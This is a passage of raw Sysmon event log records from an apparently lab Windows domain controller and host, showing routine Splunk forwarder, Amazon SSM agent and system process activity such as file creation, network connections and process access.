Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20DF3638761C7092D4BB4FFC906E83AF,SHA256=84349FFC84B4A7557292E2A2B2F8E2E4E4D07CCCCFD5DEE0F3EDEDB8E204DB37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:59.909{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C90167364E343BB16031239E186649EF,SHA256=8BB6DCED8096A260054DFD6D90DAB39D4CC933EE585DD3FE2A0A64554381B515,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:00.910{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E76C6AB42F62126240C0BCE88A4E52D1,SHA256=CBF9BA82E1FE67DCFB7B67995E85BDB8DDEE1C8D838626917F988668DA1CC89B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000298073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:19:58.614{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49504-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000298072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:00.017{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-162MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:01.914{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=802B93971145267362563488E3994494,SHA256=F8578199A6C84DBD0A8A0AE705356D0BB3308B0A24BCB2A43ACDC4D54E0A8426,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221975Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:19:59.635{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51685-false10.0.1.12-8000- 23542300x8000000000000000221974Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:01.134{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9EA5C6228AC713B71E32B7BCE84D882,SHA256=05B0B7394983821D861E895F26B28C83E6D34955C6B7AC350EF567A03FB617D6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:01.472{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1861-6216-4507-000000003802}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:01.472{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:01.472{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:01.472{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:01.472{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:01.472{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1861-6216-4507-000000003802}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:01.472{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1861-6216-4507-000000003802}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:01.474{C8EA50B7-1861-6216-4507-000000003802}6460C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:01.012{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-163MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000298094Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:02.916{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=708438B379F821FD3A15201DC15E6293,SHA256=9F9257FCFF8C31F5DA6552CE36792C1E215A498F9AEE83F1452865B68B54A3A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221976Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:02.134{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9151A71FD2827915EB514B242A44B0B,SHA256=BE6D5639ECC22E082C36CB5FEFC95AE13D4331DB1CF47BA851088BE42CD0752F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298093Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:02.678{C8EA50B7-1862-6216-4607-000000003802}69487004C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298092Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:02.360{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1862-6216-4607-000000003802}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298091Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:02.360{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298090Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:02.360{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298089Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:02.360{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298088Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:02.360{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:02.360{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-1862-6216-4607-000000003802}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000298086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:02.360{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1862-6216-4607-000000003802}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000298085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:02.362{C8EA50B7-1862-6216-4607-000000003802}6948C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000298103Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:03.932{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5BAC0C00C99CBBB20DC68A20385BE66,SHA256=19727ACA4106DC5F2B32C1C530059A2C9D28A0FB6AB7D6C1C0B217D726A34B74,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221977Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:20:03.353{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4D06F2BDF91A30E78E69C15CE992982,SHA256=65903DAC6E8F82284621DD1F6052447E3F69D280A57E4F6EAAF62B10140E903C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000298102Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:03.716{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1863-6216-4707-000000003802}5132C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298101Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:03.716{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298100Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:20:03.716{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000298099Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 